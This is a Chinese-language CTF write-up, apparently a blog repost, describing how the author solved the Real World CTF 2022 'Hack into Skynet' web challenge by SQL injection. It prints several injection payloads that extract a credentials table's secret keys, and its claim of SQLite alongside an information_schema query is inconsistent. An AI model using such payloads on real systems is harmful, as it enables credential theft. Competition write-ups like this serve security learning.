写点什么

攻破天网系统——Real World CTF (2022) 解题实录

作者:qife
  • 2025-08-03
    福建
  • 本文字数:752 字

    阅读完需:约 2 分钟

<在线夺旗赛>

各位黑客朋友们好ッ✋✋,


这份技术报告将分享我在 Real World CTF 2022 中破解 Web 挑战的一种可行方案。所有挑战都基于真实世界应用构建,由于疫情影响,第四届 Real World CTF 采用线上模式。从挑战描述中,我判断存在 SQL 注入漏洞。经过约 24 小时尝试却以失败告终!


在此衷心感谢 Fanky 和 xl00t。比赛期间这个挑战让我备受煎熬,但在与两位交流后,我以全新视角重新尝试并最终攻克。因此决定为这个特殊挑战撰写技术报告。现在让我们开始:


挑战名称:入侵天网系统


挑战类型:Web


难度等级:薛定谔级(如同既死又活的假想猫,这个挑战可能"简单到发狂")


存在两种预期解决方案:


  1. 通过逻辑漏洞绕过登录并实施 SQL 注入(需绕过 WAF)

  2. 滥用 Flask 框架特性


点击查看第二种方案:"滥用Flask框架"

SQL 注入攻击

数据库识别

通过代码分析确认后端使用 SQLite 数据库,存在target_credentials表。

注入验证

有效 payload 示例:


'; select * from target_credentials limit 1 offset '1
复制代码


通过修改 offset 值遍历 12 条记录。

数据库结构探测

'; select column_name, null from information_schema.columns    where table_name='target_credentials' limit 1 offset '1
复制代码


确认表结构:


  1. account

  2. password

  3. access_key

  4. secret_key

最终攻击

获取敏感数据的终极 payload:


'; select secret_key, null from target_credentials limit 4 offset '0
复制代码


成功提取全部关键字段!


最终 flag


rwctf{t0-h4ck-$kynet-0r-f1ask_that-Is-th3-questi0n}



自动化实现

可使用以下 exploit 代码自动化攻击流程:(代码作者:xl00t)


希望这份技术报告对您有所启发。欢迎通过 @7h3h4ckv157 与我交流安全技术。下次见!🔈


附:Infosec Writeups 首届虚拟会议 IWCon2022 正在招募,汇聚 16 位顶尖安全专家,详情见iwcon.live更多精彩内容 请关注我的个人公众号 公众号(办公 AI 智能小助手)公众号二维码

办公AI智能小助手
用户头像

qife

关注

还未添加个人签名 2021-05-19 加入

还未添加个人简介

评论

发布
暂无评论
攻破天网系统——Real World CTF (2022) 解题实录_CTF_qife_InfoQ写作社区